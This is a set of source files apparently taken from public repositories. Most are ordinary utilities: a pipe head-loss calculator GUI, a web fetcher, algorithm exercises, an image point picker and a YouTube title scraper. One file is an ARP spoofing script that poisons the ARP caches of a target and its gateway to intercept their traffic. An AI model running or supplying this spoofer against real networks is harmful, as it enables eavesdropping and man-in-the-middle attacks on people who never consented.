                    messagebox.showwarning("Warning","The width and height have be greater than 0!")
                else:
                    Pr = 2 * (sA + sB) # perimeter of the section
                    dc = 4 * (Ar/Pr) #hydraulic diameter
                    Re = V0 * (dc/ni)
                    if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
                    elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
    if modF_ == 2:
        Q0 = float(Q0_.get())
        if Q0 <= 0:
            messagebox.showwarning("Warning","The flow rate has to be greater than 0!")
        else:
            if EPS==0:
                messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
            else:
                Ar = sA * sB # area of the section
                if Ar<=0:
                    messagebox.showwarning("Warning","The width and height have be greater than 0!")
                else:
                    V0 = Q0/Ar  # mean velocity from flow rate
                    Pr = 2 * (sA + sB) # perimeter of the section
                    dc = 4 * (Ar/Pr) #hydraulic diameter
                    Re = V0 * (dc/ni)
                    if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
                    elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
def calGen():
    """Validate inputs for an IRREGULAR section (area + perimeter entered
    directly) and run the selected friction model with dc = 4*A/P.

    NOTE(review): dc (and, in flow-rate mode, V0 = Q0/Ar) is computed BEFORE
    the Ar<=0 check, so Ar == 0 or Pr == 0 raises ZeroDivisionError instead
    of showing the warning — the guards should come first.
    """
    fp = fluid()#
    ni = fp[3]  # kinematic viscosity
    modF_ = modF.get()
    EPS = float(eps_.get())
    Ar = float(A_.get())  # area [m2]
    Pr = float(P_.get())  # perimeter [m]
    if modF_ == 1:
        V0 = float(V0_.get())
        if V0 <= 0:
            messagebox.showwarning("Warning","The velocity has to be greater than 0!")
        else:
            if EPS==0:
                messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
            else:
                if Ar<=0:
                    messagebox.showwarning("Warning","Please, do check Area and Perimeter of the section!")
                else:
                    dc = 4 * (Ar/Pr) #hydraulic diameter
                    Re =V0*(dc/ni)
                    if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
                    elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
    if modF_ == 2:
        Q0 = float(Q0_.get())
        if Q0 <= 0:
            messagebox.showwarning("Warning","The flow rate has to be greater than 0!")
        else:
            if EPS==0:
                messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
            else:
                V0 = Q0/Ar
                if Ar<=0:
                    messagebox.showwarning("Warning","Please, do check Area and Perimeter of the section!")
                else:
                    dc = 4 * (Ar/Pr) #hydraulic diameter
                    V0 = Q0/Ar
                    Re =V0*(dc/ni)
                    if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
                    elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
def CAL():
    """Top-level 'Calculate' handler: check the global selections, then
    dispatch to the per-section calculators (calC / calR / calGen).

    NOTE(review): after a 'Select the Fluid!' or 'velocity/flow rate' warning
    execution still falls through to the section dispatch — confirm whether
    the handler should return early instead.
    """
    modF_ = modF.get()
    sec_ = sec.get()
    F_ = f_sel.get()
    if F_ not in flu_opt:
        messagebox.showwarning("Warning","Select the Fluid!")
    if modF_ == 0:
        messagebox.showwarning("Warning","You must select velocity\n or flow rate!")
    if sec_ == 1:
        calC()
    elif sec_ == 2:
        calR()
    elif sec_ == 3:
        calGen()
    elif sec_ == 0:
        messagebox.showwarning("Warning","You must select the kind of section!")
def ACT():
    """Section radio-button handler: enable the entries relevant to the
    chosen cross-section, zero and disable the others, and gray out the
    labels of the inactive inputs."""
    # Circular: only the diameter entry is active
    if sec.get()==1:
        d.config(state='normal')
        d.delete(0,'end')
        d.insert('end',0)
        w.delete(0,'end')
        w.insert('end',0)
        w.config(state='disabled')
        h.delete(0,'end')
        h.insert('end',0)
        h.config(state='disabled')
        p.delete(0,'end')
        p.insert('end',0)
        p.config(state='disabled')
        a.delete(0,'end')
        a.insert('end',0)
        a.config(state='disabled')
        dd.config(fg='black')
        ddu.config(fg='black')
        ww.config(fg='gray')
        wwu.config(fg='gray')
        hh.config(fg='gray')
        hhu.config(fg='gray')
        AA.config(fg='gray')
        AAU.config(fg='gray')
        PP.config(fg='gray')
        PPU.config(fg='gray')
    # Rectangular: width and height entries are active
    if sec.get()==2:
        w.config(state='normal')
        h.config(state='normal')
        w.delete(0,'end')
        w.insert('end',0)
        h.delete(0,'end')
        h.insert('end',0)
        d.delete(0,'end')
        d.insert('end',0)
        d.config(state='disabled')
        a.delete(0,'end')
        a.insert('end',0)
        a.config(state='disabled')
        p.delete(0,'end')
        p.insert('end',0)
        p.config(state='disabled')
        ww.config(fg='black')
        wwu.config(fg='black')
        hh.config(fg='black')
        hhu.config(fg='black')
        d.config(state='disabled')
        dd.config(fg='gray')
        ddu.config(fg='gray')
        a.config(state='disabled')
        AA.config(fg='gray')
        AAU.config(fg='gray')
        p.config(state='disabled')
        PP.config(fg='gray')
        PPU.config(fg='gray')
    # Irregular: area and perimeter entries are active
    if sec.get()==3:
        a.config(state='normal')
        p.config(state='normal')
        a.delete(0,'end')
        a.insert('end',0)
        p.delete(0,'end')
        p.insert('end',0)
        d.delete(0,'end')
        d.insert('end',0)
        d.config(state='disabled')
        w.delete(0,'end')
        w.insert('end',0)
        w.config(state='disabled')
        h.delete(0,'end')
        h.insert('end',0)
        h.config(state='disabled')
        PP.config(fg='black')
        PPU.config(fg='black')
        AA.config(fg='black')
        AAU.config(fg='black')
        dd.config(fg='gray')
        ddu.config(fg='gray')
        ww.config(fg='gray')
        wwu.config(fg='gray')
        hh.config(fg='gray')
        hhu.config(fg='gray')
def ACTF():
    """Velocity/flow-rate radio-button handler: enable whichever of the two
    entries was chosen, reset both to 0, disable the other and gray out its
    labels."""
    # Mean velocity selected
    if modF.get()==1:
        v0.config(state='normal')
        Q0.delete(0,'end')
        Q0.insert('end',0)
        Q0.config(state='disabled')
        v0.delete(0,'end')
        v0.insert('end',0)
        Q0.config(fg='black')
        l2.config(fg='black')
        l2_1.config(fg='black')
        f3.config(fg='gray')
        f3_1.config(fg='gray')
    # Flow rate selected
    if modF.get()==2:
        Q0.config(state='normal')
        v0.delete(0,'end')
        v0.insert('end',0)
        v0.config(state='disabled')
        Q0.delete(0,'end')
        Q0.insert('end',0)
        v0.config(fg='black')
        f3.config(fg='black')
        f3_1.config(fg='black')
        l2.config(fg='gray')
        l2_1.config(fg='gray')
def ACTF2():
    """Formulation radio-button handler: highlight the chosen equation's
    label and gray out the other."""
    if modForm.get() == 1:
        for1.config(state='normal')
        for1.config(fg='black')
        for2.config(fg='gray')
    if modForm.get() == 2:
        for2.config(state='normal')
        for1.config(fg='gray')
        for2.config(fg='black')
#Define a callback function
def callback(url):
    #Open *url* in a new browser tab (used by the References hyperlink).
    webbrowser.open_new_tab(url)
def table():
    """Open a secondary window listing typical absolute-roughness values
    [mm]; sets the globals root2 (the window) and fin2 (open flag) that
    EX() relies on."""
    choices = """
    - Flexible Rubber: 0.3 - 4;\n
    - New cast iron: 0.25 - 0.8;\n
    - Steel commercial pipe: 0.045 - 0.09;\n
    - Flexible Rubber Tubing Smooth: 0.006 - 0.07;\n
    - Stainless steel: 0.0015;\n
    - PVC and Plastic: 0.0015 - 0.007;\n
    - Asphalted Cast Iron: 0.1 - 1;\n
    - Cast Iron (new): 0.25;\n
    - Cast Iron (old): 1.00;\n
    - Galvanized Iron: 0.025 - 0.150;\n
    - Wood Stave: 0.180 - 0.91;\n
    - Wood Stave (used): 0.250 - 1.0;\n
    - Smooth Cement: 0.50;\n
    - Concrete – Very Smooth: 0.025 - 0.2;\n
    - Concrete – Fine (Floated, Brushed): 0.200 - 0.8;\n
    - Concrete – Rough, Form Marks: 0.8 - 3;\n
    - Riveted Steel: 0.91-9.1;\n
    - Water Mains with Tuberculations: 1.2;\n
    - Brickwork, Mature Foul Sewers: 3;\n
    """
    tit = "Table of absolute roughness"
    global root2, fin2
    root2 = tk.Tk()
    root2.title('Roughness Values')
    root2.geometry("450x550+900+50")
    root2.resizable(width=False, height=False)
    root2.iconbitmap('roughness.ico')
    label1 = tk.Label(root2,text=tit,font=('Helvetica', 14, 'normal'))
    label1.pack()
    T = tk.Text(root2, height=25, width=40,font=('Helvetica', 12, 'normal'))
    T.pack()
    T.config(state='normal')
    T.insert(tk.END, choices)
    # Make the table read-only once populated
    T.config(state='disabled')
    fin2 = 1
    tk.Button(root2,text="EXIT",command=EX,font=('Helvetica', 12, 'normal','bold'),height = 1, width = 10).pack(pady=10)
    root2.mainloop()
def EX():
    """Close the roughness-table window (root2) if it has been opened.

    Bug fix: the original only assigned ``var_exists`` in the ``except``
    branch, so the function crashed with an unbound-variable error whenever
    the window DID exist — and its exists/missing branches were inverted
    (it tried ``root2.destroy()`` precisely when root2 was undefined).
    """
    var_exists = True
    try:
        fin2  # set by table() when the window is created
    except NameError:
        var_exists = False
    if var_exists:
        root2.destroy()
    else:
        print("Window does not exist")
def EX_out():
    #Close the main application window and end the event loop.
    root.destroy()
# ##end of Functions
# ##########################################
###########Main
#INPUT widgets — "Fluid Parameters" frame (frame00)
#fluid selection drop-down
f_sel = tk.StringVar()
f_sel.set(flu_opt[0])
f1 = tk.OptionMenu(frame00,f_sel, *flu_opt)
f1.config(width=8,font=f_H11)
f1.grid(row=0,column=1,sticky='W',pady=5)
tk.Label(frame00,text="Choose fluid",font=f_H12).grid(row=0,column=0,padx=15,sticky="W")
#temperature selection (Celsius), default 20
tk.Label(frame00,text="Temperature",font=f_H12).grid(row=1,column=0,padx=15,pady=5,sticky='W')
tk.Label(frame00,text="[°C]",font=f_H12).grid(row=1, column=2,pady=5)
T_ = tk.StringVar()
t1 = tk.Entry(frame00,textvariable=T_ , width=6, justify="center",font=f_H12)
t1.grid(row = 1, column=1,pady=5)
t1.insert("end", 20)
#Method: mean Velocity (1) or Flow rate (2); ACTF toggles the entries
modF = tk.IntVar()
l2 = tk.Radiobutton(frame00,text="Mean Velocity",padx = 10,variable=modF,value=1,font=f_H12)
l2.grid(row=2,column=0,sticky='W')
l2.configure(command=ACTF, indicatoron=1)
l2_1 = tk.Label(frame00,text="[m/s]",padx = 5,font=f_H12)
l2_1.grid(row=2,column=2,pady=5)
l2.select()
V0_ = tk.StringVar()
v0 = tk.Entry(frame00,textvariable=V0_ , width=6,justify="center",font=f_H12)
v0.grid(row=2,column=1,pady=5)
v0.insert('end',0)
v0.configure(state='normal')
f3 = tk.Radiobutton(frame00,text="Flow Rate",padx = 10,variable=modF,value=2,font=f_H12)
f3.grid(row=3,column=0,sticky='W')
f3.configure(command=ACTF)
f3_1 = tk.Label(frame00,text="[m\xb3/s]", padx = 5,font=f_H12)
f3_1.grid(row=3,column=2,pady=5)
f3.config(fg='gray')
f3_1.config(fg='gray')
Q0_ = tk.StringVar()
Q0 = tk.Entry(frame00,textvariable=Q0_ , width=6, justify="center",font=f_H12)
Q0.grid(row=3,column=1,pady=5)
Q0.insert('end',0)
Q0.configure(state='disabled')
#####Geometry settings — "Duct Geometry" frame (frame01)
#Length of the duct [m], default 1
L0 = tk.Label(frame01,text="Duct Length",font=f_H12)
L0.grid(row = 0, column = 0,padx=10,pady =5)
L_ = tk.StringVar()
L1 = tk.Entry(frame01,textvariable = L_ , width = 6, justify="center",font=f_H12)
L1.grid(row = 0 , column=1,padx=10,pady=5)
L1.insert("end",1)
tk.Label(frame01,text="[m]",font=f_H12,justify="right").grid(row=0, column=2,padx=10,pady = 5)
# #Epsilon selection: absolute wall roughness [mm], default 0.0015
tk.Label(frame01,text="Wall roughness",font=f_H12).grid(row=1,column=0,padx=10,pady = 5)
tk.Label(frame01,text="[mm]",font=f_H12).grid(row=1,column=2,padx=10,pady = 5)
eps_ = tk.StringVar()
eps = tk.Entry(frame01,textvariable=eps_,width=8,justify="center",font=f_H12)
eps.grid(row=1,column=1,padx=10,pady = 5)
eps.insert("end", 0.0015)
##Cross Section Geometry — "Cross Section Definition" frame (frame02)
# Radio buttons pick the section kind; ACT() enables the matching entries.
sec = tk.IntVar()
s1 = tk.Radiobutton(frame02,text="Circular Section", padx=10,variable=sec,value=1,indicatoron=1)
s1.configure(font=f_H12,command=ACT)
s1.grid(row=0, column=0,sticky='W')
s1.select()
s2 = tk.Radiobutton(frame02,text="Rectangular Section",padx=10,variable=sec,value=2,indicatoron=1)
s2.configure(font=f_H12,command=ACT)
s2.grid(row=1, column=0,sticky='W')
s3 = tk.Radiobutton(frame02,text="Irregular Section",padx=10,variable=sec,value=3,indicatoron=1)
s3.configure(font=f_H12,command=ACT)
s3.grid(row=2, column=0,sticky='W')
###Geometry inputs
#Circular Section: diameter [m]
dd = tk.Label(frame02,text="Diameter",font=f_H12,justify="left")
dd.grid(row=3,column=0,padx=20,pady = 5)
ddu = tk.Label(frame02,text="[m]",font=f_H12)
ddu.grid(row=3,column=2,padx=10,pady=5)
D_ = tk.StringVar()
d = tk.Entry(frame02,textvariable=D_,width=6,justify="center",font=f_H12)
d.grid(row=3,column=1,padx=10,pady=5)
d.insert('end',0)
d.config(state='normal')
#Rectangular section
#Width [m]
ww = tk.Label(frame02,text="Width",font=f_H12,justify="left")
ww.grid(row=5,column=0,padx=20,pady = 5)
wwu = tk.Label(frame02,text="[m]",font=f_H12)
wwu.grid(row=5,column=2,padx=20,pady=5)
W_ = tk.StringVar()
w = tk.Entry(frame02,textvariable=W_,width=6,justify="center",font=f_H12)
w.grid(row=5,column=1,padx=10,pady=5)
w.insert('end',0)
w.config(state='disabled')
#Height [m]
hh = tk.Label(frame02,text="Height",font=f_H12,justify="left")
hh.grid(row=6,column=0,padx=20,pady = 5)
hhu = tk.Label(frame02,text="[m]",font=f_H12,justify="left")
hhu.grid(row=6,column=2,padx=20,pady = 5)
H_ = tk.StringVar()
h = tk.Entry(frame02,textvariable=H_ , width=6,justify="center",font=f_H12)
h.grid(row=6,column=1,padx=10,pady=5)
h.insert('end',0)
h.config(state='disabled')
#Irregular section
#Area [m2]
AA = tk.Label(frame02,text="Area",font=f_H12,justify="left")
AA.grid(row=7,column=0,padx=20,pady = 5)
AAU = tk.Label(frame02,text="[m\xb2]",font=f_H12)
AAU.grid(row=7,column=2,padx=20,pady=5)
A_ = tk.StringVar()
a = tk.Entry(frame02,textvariable=A_,width=6,justify="center",font=f_H12)
a.grid(row=7,column=1,padx=10,pady=5)
a.insert('end',0)
a.config(state='disabled')
#Perimeter [m]
PP = tk.Label(frame02,text="Perimeter",font=f_H12,justify="left")
PP.grid(row=8,column=0,padx=20,pady = 5)
PPU = tk.Label(frame02,text="[m]",font=f_H12,justify="left")
PPU.grid(row=8,column=2,padx=20,pady = 5)
P_ = tk.StringVar()
p = tk.Entry(frame02,textvariable=P_ , width=6,justify="center",font=f_H12)
p.grid(row=8,column=1,padx=10,pady=5)
p.insert('end',0)
p.config(state='disabled')
#label colors at startup: circular section active, everything else grayed
ww.config(fg='gray')
wwu.config(fg='gray')
hh.config(fg='gray')
hhu.config(fg='gray')
PP.config(fg='gray')
PPU.config(fg='gray')
AA.config(fg='gray')
AAU.config(fg='gray')
#Formulation selection CooleBrookWhite or SixParamters equation
modForm = tk.IntVar()
for1 = tk.Radiobutton(frame04, text="Colebrook-White Equation", padx = 10, variable=modForm , value=1, font=f_H12)
for1.grid(row=4, column=0, sticky='W')
for1.configure(command=ACTF2, indicatoron=1)
for1.select()
for1.configure(state='normal')
for2 = tk.Radiobutton(frame04,text="Six-Factors Equation", padx = 10, variable=modForm, value=2,font=f_H12)
for2.grid(row=4,column=1,sticky='W')
for2.configure(command=ACTF2)
for2.config(fg='gray')
link = tk.Label(frame04,text="References", padx = 5, font = f_Ref, fg='#000080')
link.grid(row=4,column=2,sticky='W')
link.bind("<Button-1>", lambda e: callback("https://doi.org/10.1002/aic.16535"))
# #Results
VarList = ['Density [kg/m\xb3]','Specific weight [N/m\xb3]','Dinamic viscosity [Pa s]','Kinematic viscosity [m\xb2/s]',
'Hydraulic Diameter [m]','Reynolds [-]','Skin Friction [-]','Specific Head-Loss [m/m]','Head-Loss [m]',
'Head-Loss [Pa]']
for i,var in enumerate(VarList):
tk.Label(frame03,text=var,font=f_H12).grid(row=i,column=0,sticky="E",pady=11)
tk.Frame(frame03,height=35,width=150, colormap="new",relief="sunken",bd=2).grid(row=i,column=1,sticky="E",padx=18,pady=11)
###############Buttons
##s3 = tk.Button(frame05,text='Roughness Table', command=table,font=f_H12)
##s3.config(height=1, width=15)
##s3.grid(row=0,column=0,padx=10,pady=10,ipadx=20)
s4 = tk.Button(frame05,text="Calculate",command=CAL,font=f_H12)
s4.config( height = 1, width = 15)
s4.grid(row=0,column=1,padx=10,pady=10,ipadx=20)
s5 = tk.Button(frame05,text="EXIT",command=EX_out,font=f_H12)
s5.config( height = 1, width = 15)
s5.grid(row=0,column=2,padx=10,pady=10,ipadx=20)
######################
root.mainloop()
| vicio1975/SkinFriction-HeadLoss | SkinFriction_Loss_4.pyw | SkinFriction_Loss_4.pyw | pyw | 23,967 | python | en | code | 5 | github-code | 36 |
21407967690 | import requests
'''
r = requests.get("http://www.google.com")
r.encoding = 'utf-8'
s = r.text
print(s)
'''
def getText(url):
    """Fetch `url` and return the response body decoded as text.

    The body is decoded with the apparent (content-sniffed) encoding.
    Returns the sentinel string "Erroroccur!" on any request failure
    (connection error, timeout, or 4xx/5xx status), preserving the
    original error contract for callers.
    """
    try:
        r = requests.get(url, timeout = 500)
        # Surface HTTP error statuses (4xx/5xx) as failures too.
        r.raise_for_status()
        r.encoding = r.apparent_encoding
        return r.text
    except requests.RequestException:
        # Narrowed from a bare `except:`, which also swallowed
        # KeyboardInterrupt and SystemExit.
        return "Erroroccur!"
if __name__ == "__main__":
url = "http://www.bilibili.com"
print(getText(url)) | zIDAedgen/crawlerAirbnb | venv/include/spider.py | spider.py | py | 402 | python | en | code | 0 | github-code | 36 |
178011559 | class Solution(object):
def peakIndexInMountainArray(self, A):
"""
:type A: List[int]
:rtype: int
"""
def helper(A, l, h):
m = (l + h) // 2
if A[m] > max(A[m + 1], A[m - 1]):
return m
elif A[m] < A[m + 1]:
return helper(A, m + 1, h)
elif A[m] < A[m - 1]:
return helper(A, l, m - 1)
return helper(A, 0, len(A) - 1)
def peakIndexInMountainArrayIterate(self, A):
l, h = 0, len(A) - 1
# the problem was set up such that a peak must exist
while True:
m = (l + h) // 2
if A[m] > max(A[m + 1], A[m - 1]):
return m
elif A[m] < A[m + 1]:
l = m + 1
elif A[m] < A[m - 1]:
h = m - 1
def peakIndexInMountainArrayIterateBad(self, A):
lo, hi = 0, len(A) - 1
while lo < hi:
mi = (lo + hi) / 2
if A[mi] < A[mi + 1]:
# peak is on the right
lo = mi + 1
else:
# peak is on the left (mid may be the peak)
hi = mi
return lo
solver = Solution()
ans = solver.peakIndexInMountainArrayIterate([0,1,2,3,0])
print(ans) | iguy0/Data-Science-Toolbox | algorithm/binary_search/852_Peak_Index_in_a_Mountain_Array.py | 852_Peak_Index_in_a_Mountain_Array.py | py | 1,296 | python | en | code | null | github-code | 36 |
32657811309 | lista = []
# Read ten values, then print each element paired with its mirror
# (first with last, second with second-to-last, ...).
for posicao in range(10):
    lista.append(input(f'Insira o numero {posicao + 1} da lista: '))

for frente, tras in zip(lista, reversed(lista)):
    print(f'{frente} -- {tras}')
| caiovale1921/Estrutura-de-Dados | Lista-Exercicios-11-03-2022/Vetor/ex01.py | ex01.py | py | 243 | python | it | code | 0 | github-code | 36 |
2649303866 | import time
import scapy.all as scapy
from scapy.layers.l2 import ARP as ARP
from scapy.layers.l2 import Ether as Ether
def get_mac(ip):
arp_request = ARP(pdst=ip)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=2, verbose=False)[0]
return answered_list[0][1].hwsrc
def restore(destination_ip, source_ip):
destination_mac = get_mac(destination_ip)
source_mac = get_mac(source_ip)
packet = ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
scapy.send(packet, count=4, verbose=False)
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = ARP(op=2, pdst=target_ip, pdsrt=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False)
target_ip = input("Enter the Target ip : ")
gateway_ip = input("Enter the Gateway ip : ")
sent_packet = 0
try:
while True:
spoof(target_ip, gateway_ip)
spoof(gateway_ip, target_ip)
sent_packet += 2
print("\r[+] Packets send = " + str(sent_packet), end="")
time.sleep(2)
except KeyboardInterrupt:
print("\nResetting changes..........")
restore(target_ip, gateway_ip)
restore(gateway_ip, target_ip)
| CrashNBurn1337/ArpSpoofer | arp_spoofing.py | arp_spoofing.py | py | 1,297 | python | en | code | 0 | github-code | 36 |
23243623755 | import cv2
import numpy as np
import tkinter as tk
from tkinter import filedialog
def load_correspondences(file_name):
    """Read point correspondences from a text file.

    Each line must hold four comma-separated integers ``x1,y1,x2,y2``:
    a point in the first image and its matching point in the second.

    Returns a pair of float32 arrays of shape (N, 2) on success, or the
    historical sentinel pair ``(False, True)`` when the file cannot be
    read or parsed (kept for backward compatibility with callers).
    """
    try:
        # Context manager guarantees the handle is closed even when a
        # malformed line raises mid-parse (the old code leaked it).
        with open(file_name, "r") as f:
            lines = [l.rstrip() for l in f.readlines()]
        points1 = []
        points2 = []
        for line in lines:
            x1, y1, x2, y2 = (int(v) for v in line.split(','))
            points1.append([x1, y1])
            points2.append([x2, y2])
        points1 = np.array(points1, np.float32)
        points2 = np.array(points2, np.float32)
        return points1, points2
    except Exception as e:
        print(e)
        print('Cannot read file', file_name)
        return False, True
def record_click(event, x, y, flags, params):
    """OpenCV mouse callback: record left-clicks and label them on the image.

    `params` is the tuple (positions, marker_color, image, window_name)
    bound via cv2.setMouseCallback. Each left-click appends [x, y] to the
    shared positions list and draws the running 1-based click count at the
    click location so the user can match points across the two windows.
    """
    # checking for left mouse clicks
    if event == cv2.EVENT_LBUTTONDOWN:
        postitions, marker_color, image, window_name = params
        font = cv2.FONT_HERSHEY_SIMPLEX
        #append coordinates of click
        postitions.append( [x, y] )
        #increment counter
        count = len(postitions)
        cv2.putText(image, str(count) , (x,y), font,
                    0.75, marker_color, 2)
        # Redraw so the new label is visible immediately.
        cv2.imshow(window_name, image)
def write_correspondence_to_file(file_name, first_positions, second_positions):
    """Write paired points as one 'x1,y1,x2,y2' line per correspondence.

    Coordinates are truncated to int. If the lists differ in length the
    extra unmatched points are ignored (zip truncates), instead of
    raising IndexError as the previous index-based loop did.
    """
    # 'with' guarantees the file is closed even if a conversion fails.
    with open(file_name, "w") as f:
        for (x1, y1), (x2, y2) in zip(first_positions, second_positions):
            f.write(f'{int(x1)},{int(y1)},{int(x2)},{int(y2)}\n')
def get_image_path(title):
    """Show a native open-file dialog titled `title` and return the chosen path.

    Returns an empty string if the user cancels the dialog.
    """
    root = tk.Tk()
    # Hide the empty Tk root window that would otherwise appear behind the dialog.
    dummy = root.withdraw()
    image_path = filedialog.askopenfilename(initialdir = ".",title = title,filetypes = (("all files","*.*"),("png files","*.png"),("jpg files","*.jpg"),("jpeg files","*.jpeg")))
    return image_path
def get_correspondences(image1_path, image2_path, points_filename='points.txt'):
    """Interactively collect matching click positions in two images.

    Opens both images in separate OpenCV windows; clicks are recorded by
    the `record_click` callback (blue labels in the first window, red in
    the second). Blocks until a key is pressed, then returns the paired
    points as two float32 (N, 2) arrays, truncated to the shorter list.

    NOTE(review): `points_filename` is accepted but never used here —
    presumably intended for write_correspondence_to_file; confirm with callers.
    """
    first_image = cv2.imread(image1_path, 1)
    second_image = cv2.imread(image2_path,1)
    # displaying the image
    first_window_name = 'First Image'
    second_window_name = 'Second Image'
    cv2.imshow(first_window_name, first_image)
    cv2.imshow(second_window_name, second_image)
    #setting up parameters to be passed to the mouse click event callback for each window
    first_image_positions = [] #list of points in first image
    first_color = (255, 0, 0) #mark the points in blue for first image
    second_image_positions = []
    second_color = (0, 0, 255) # mark points in red for the second image
    first_window_param = (first_image_positions, first_color, first_image, first_window_name)
    second_window_param = (second_image_positions, second_color, second_image, second_window_name)
    cv2.setMouseCallback(first_window_name, record_click,param=first_window_param )
    cv2.setMouseCallback(second_window_name, record_click,param=second_window_param )
    # wait for a key to be pressed to exit
    cv2.waitKey(0)
    # close the window
    cv2.destroyAllWindows()
    #ignore points that have no correspondence
    length = min(len(first_image_positions), len(second_image_positions))
    first_image_positions = first_image_positions[0:length]
    second_image_positions = second_image_positions[0:length]
    first_image_positions = np.array(first_image_positions, np.float32)
    second_image_positions = np.array(second_image_positions, np.float32)
    return first_image_positions, second_image_positions
| marwansalem/image-stitching | correspondences.py | correspondences.py | py | 3,583 | python | en | code | 0 | github-code | 36 |
34160025736 |
# Advent of Code 2016, Day 22 part 2: parse the `df`-style node listing,
# locate the empty node, and render the grid so the sliding-puzzle moves
# can be counted by hand (see the notes at the bottom of the file).
from re import findall;

with open('Day_22_Input.txt') as file:
    # Match the x/y coordinates and the Size/Used/Avail fields (T or %).
    pattern = 'x\d+|y\d+|\d+T|\d+%';
    grid = [[0 for j in range(33)] for i in range(30)];
    for line in file:
        data = findall(pattern, line.strip());
        if len(data) != 0:
            x = int(data[0][1:]);
            y = int(data[1][1:]);
            size = int(data[2][:-1]);
            used = int(data[3][:-1]);
            available = int(data[4][:-1]);
            grid[y][x] = [size, used, available];
            # The single empty node is the movable "hole" of the puzzle.
            if used == 0:
                print((x, y));
    # Render: (.) target cell, G goal data, --- the empty node,
    # ' . ' movable nodes, ' # ' walls (too large to fit anywhere).
    for y in range(30):
        for x in range(33):
            if (x == 0) and (y == 0):
                print('(.)', end = '');
            elif (x == 32) and (y == 0):
                print(' G ', end = '');
            elif grid[y][x][1] == 0:
                print('---', end = '');
            else:
                # A node is movable iff some node could absorb its data.
                pair_found = 0;
                for y2 in range(30):
                    for x2 in range(33):
                        if grid[y2][x2][2] >= grid[y][x][1]:
                            pair_found = 1;
                if pair_found:
                    print(' . ', end = '');
                else:
                    print(' # ', end = '');
    print();
# 70 to move empty space next to goal data
# 155? to move to 0,0 | segloff23/Advent-of-Code-2016-Challenge | Day_022/Day_22_Part_2.py | Day_22_Part_2.py | py | 1,250 | python | en | code | 0 | github-code | 36 |
7625551099 | from bs4 import BeautifulSoup as bs
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
# Launch Edge, open the target playlist/channel page, and press END twice
# so YouTube lazy-loads more video entries before scraping.
driver = webdriver.Edge(executable_path = r'Path of msedgedriver here')
url = "YOUTUBE URL HERE"
driver.get(url)
elem = driver.find_element_by_tag_name('html')
elem.send_keys(Keys.END)
time.sleep(3)
elem.send_keys(Keys.END)
# Parse the fully rendered DOM (not the initial page source).
innerHTML = driver.execute_script("return document.body.innerHTML")
page_soup = bs(innerHTML, 'html.parser')
# Video links carry id="video-title"; not-yet-rendered entries have a
# None title and are skipped.
res = page_soup.find_all('a',{'id':'video-title'})
titles = []
for video in res:
    print(video.get('title'))
    if video.get('title') != None:
        titles.append((video.get('title')))
# Persist one title per line (utf-8 handles non-ASCII titles).
file = open('YoutubeList.txt','w+', encoding="utf-8")
for title in titles:
    file.write(title+'\n')
file.close()
driver.close()
| Hiperultimate/Youtube-Playlist-Save-Title | youtubeListMaker.py | youtubeListMaker.py | py | 824 | python | en | code | 0 | github-code | 36 |
3147265908 | """
Common Flitter initialisation
"""
import logging
import sys
from loguru import logger
try:
    # Optional: compile .pyx modules on import when Cython/pyximport is available.
    import pyximport
    pyximport.install()
except ImportError:
    pass

# Default loguru level and sink format; configure_logger() applies these
# (and may override the level).
LOGGING_LEVEL = "SUCCESS"
LOGGING_FORMAT = "{time:HH:mm:ss.SSS} {process}:{extra[shortname]:16s} | <level>{level}: {message}</level>"
class LoguruInterceptHandler(logging.Handler):
    """stdlib `logging` handler that forwards every record to loguru.

    Installing it as the root handler routes third-party `logging` output
    through the loguru sinks configured in `configure_logger`.
    """

    @classmethod
    def install(cls):
        """Attach a new instance as the root stdlib handler and return it."""
        handler = cls()
        logging.basicConfig(handlers=[handler], level=0)
        return handler

    def uninstall(self):
        """Detach this instance from the root stdlib logger."""
        logging.getLogger().removeHandler(self)

    def emit(self, record):
        """Re-emit a stdlib record via loguru, preserving level and call site."""
        try:
            level = logger.level(record.levelname).name
        except ValueError:
            # Level name unknown to loguru (custom level): use the numeric value.
            level = record.levelno
        # Walk out of the stdlib logging machinery so loguru reports the
        # real caller, not logging internals.
        frame, depth = logging.currentframe().f_back, 1
        while frame.f_code.co_filename == logging.__file__:
            frame = frame.f_back
            depth += 1
        logger.opt(depth=depth, exception=record.exc_info).log(level, record.getMessage())
def configure_logger(level=None):
    """Configure the loguru stderr sink and intercept stdlib logging.

    When `level` is given it also becomes the new module-wide default
    (stored in LOGGING_LEVEL); otherwise the current default is used.
    Returns the configured loguru `logger`.
    """
    global LOGGING_LEVEL
    if level is None:
        level = LOGGING_LEVEL
    else:
        LOGGING_LEVEL = level
    # `shortname` strips the leading 'flitter' package prefix for compact log lines.
    logger.configure(handlers=[dict(sink=sys.stderr, format=LOGGING_FORMAT, level=level, enqueue=True)],
                     patcher=lambda record: record['extra'].update(shortname=record['name'].removeprefix('flitter')))
    LoguruInterceptHandler.install()
    return logger
def name_patch(logger, name):
    """Return a logger whose records report `name` (and its short form) as the source."""
    return logger.patch(lambda record, name=name: (record.update(name=name),
                                                   record['extra'].update(shortname=name.removeprefix('flitter'))))
| jonathanhogg/flitter | src/flitter/__init__.py | __init__.py | py | 1,653 | python | en | code | 8 | github-code | 36 |
13712488384 | import os
from os.path import join
from os.path import dirname
import shutil
import sys
from threading import Thread
import time
import zmq
import yaml
def get_pyneal_scanner_test_paths():
    """ Return a dictionary with relevant paths for the pyneal_scanner_tests
    within the `tests` dir
    """
    # Resolve the fixed directory layout relative to this file:
    # <pyneal>/tests/<this package>/<this file>
